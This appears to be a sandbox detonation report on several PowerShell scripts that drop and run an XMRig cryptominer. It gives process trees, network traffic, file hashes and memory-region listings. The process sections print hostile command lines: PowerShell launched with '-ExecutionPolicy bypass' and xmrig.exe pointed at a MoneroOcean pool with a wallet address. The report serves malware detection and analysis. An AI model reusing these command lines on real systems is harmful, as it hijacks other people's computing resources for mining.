memory/2628-61-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-62-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-63-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-64-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-65-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-66-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-67-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-68-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-69-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-70-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-71-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-72-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-73-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-74-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-75-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-76-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-77-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-78-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-79-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-80-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-81-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-82-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-83-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-84-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-85-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-86-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-87-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-88-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-89-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-90-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-91-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-92-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-93-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-94-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-95-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-96-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-97-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-98-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-99-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-100-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-101-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-102-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-103-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-104-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-105-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-106-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-107-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-108-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-109-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-110-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-111-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-112-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-113-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-114-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-115-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-116-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

memory/2628-117-0x00007FF6DAE50000-0x00007FF6DBA83000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:14

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Only the DNS query for github.com was recorded in this run: no TCP session to GitHub, no dropped xmrig.exe and no pool connection follow, which is why the miner signatures are absent here. Treat it as an incomplete detonation, not a clean result.

Files

memory/3296-0-0x00007FF89DDC3000-0x00007FF89DDC5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_du5v2dzf.pf0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3296-1-0x00000201404C0000-0x00000201404E2000-memory.dmp

memory/3296-11-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/3296-12-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/3296-13-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/3296-14-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/3296-15-0x00007FF89DDC3000-0x00007FF89DDC5000-memory.dmp

memory/3296-16-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

memory/3296-17-0x00007FF89DDC0000-0x00007FF89E881000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:25

Platform

win10v2004-20240611-en

Max time kernel

1795s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4296,i,3595107284059830391,18018199024659337217,262144 --variations-seed-version --mojo-platform-channel-handle=4064 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1036,i,3595107284059830391,18018199024659337217,262144 --variations-seed-version --mojo-platform-channel-handle=4316 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
GB 2.16.34.73:443 www.bing.com tcp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 73.34.16.2.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp

Files

memory/840-0-0x00007FFCB0DB3000-0x00007FFCB0DB5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dyqcan5j.uj3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/840-10-0x000001E140580000-0x000001E1405A2000-memory.dmp

memory/840-11-0x00007FFCB0DB0000-0x00007FFCB1871000-memory.dmp

memory/840-12-0x00007FFCB0DB0000-0x00007FFCB1871000-memory.dmp

memory/840-14-0x00007FFCB0DB0000-0x00007FFCB1871000-memory.dmp

memory/840-15-0x000001E1405F0000-0x000001E140602000-memory.dmp

memory/840-16-0x000001E125E10000-0x000001E125E1A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2204-47-0x00000157EA860000-0x00000157EA880000-memory.dmp

memory/2204-48-0x00000157EC060000-0x00000157EC080000-memory.dmp

memory/2204-49-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/840-50-0x00007FFCB0DB3000-0x00007FFCB0DB5000-memory.dmp

memory/840-51-0x00007FFCB0DB0000-0x00007FFCB1871000-memory.dmp

memory/2204-52-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/840-53-0x00007FFCB0DB0000-0x00007FFCB1871000-memory.dmp

memory/2204-55-0x00000157EC080000-0x00000157EC0A0000-memory.dmp

memory/2204-54-0x00000157EC0A0000-0x00000157EC0C0000-memory.dmp

memory/2204-56-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/840-57-0x00007FFCB0DB0000-0x00007FFCB1871000-memory.dmp

memory/2204-58-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-60-0x00000157EC080000-0x00000157EC0A0000-memory.dmp

memory/2204-59-0x00000157EC0A0000-0x00000157EC0C0000-memory.dmp

memory/2204-61-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-62-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-63-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-64-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-65-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-66-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-67-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-68-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-69-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-70-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-71-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-72-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-73-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-74-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-75-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-76-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-77-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-78-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-79-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-80-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-81-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-82-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-83-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-84-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-85-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-86-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-87-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-88-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-89-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-90-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-91-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-92-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-93-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-94-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-95-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-96-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-97-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-98-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-99-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-100-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-101-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-102-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-103-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-104-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-105-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-106-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-107-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-108-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-109-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-110-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-111-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-112-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-113-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-114-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-115-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-116-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-117-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-118-0x00007FF668250000-0x00007FF668E83000-memory.dmp

memory/2204-119-0x00007FF668250000-0x00007FF668E83000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:01

Platform

win11-20240611-en

Max time kernel

1791s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp

Files

memory/4828-0-0x00007FFD62DB3000-0x00007FFD62DB5000-memory.dmp

memory/4828-1-0x00007FFD62DB0000-0x00007FFD63872000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zeii520z.rfz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4828-10-0x000001CC44E50000-0x000001CC44E72000-memory.dmp

memory/4828-11-0x00007FFD62DB0000-0x00007FFD63872000-memory.dmp

memory/4828-12-0x00007FFD62DB0000-0x00007FFD63872000-memory.dmp

memory/4828-14-0x000001CC44EE0000-0x000001CC44EF2000-memory.dmp

memory/4828-15-0x000001CC44ED0000-0x000001CC44EDA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3160-46-0x0000022D7F720000-0x0000022D7F740000-memory.dmp

memory/3160-47-0x0000022D7F750000-0x0000022D7F770000-memory.dmp

memory/3160-48-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/4828-49-0x00007FFD62DB0000-0x00007FFD63872000-memory.dmp

memory/4828-50-0x00007FFD62DB3000-0x00007FFD62DB5000-memory.dmp

memory/3160-52-0x0000022D7F790000-0x0000022D7F7B0000-memory.dmp

memory/3160-51-0x0000022D7F770000-0x0000022D7F790000-memory.dmp

memory/3160-53-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-54-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-55-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-57-0x0000022D7F790000-0x0000022D7F7B0000-memory.dmp

memory/3160-56-0x0000022D7F770000-0x0000022D7F790000-memory.dmp

memory/3160-58-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-59-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-60-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-61-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-62-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-63-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-64-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-65-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-66-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-67-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-68-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-69-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-70-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-71-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-72-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-73-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-74-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-75-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-76-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-77-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-78-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-79-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-80-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-81-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-82-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-83-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-84-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-85-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-86-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-87-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-88-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-89-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-90-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-91-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-92-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-93-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-94-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-95-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-96-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-97-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-98-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-99-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-100-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-101-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-102-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-103-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-104-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-105-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-106-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-107-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-108-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-109-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-110-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-111-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-112-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-113-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-114-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-115-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

memory/3160-116-0x00007FF727170000-0x00007FF727DA3000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:05

Platform

win10v2004-20240611-en

Max time kernel

1789s

Max time network

1786s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

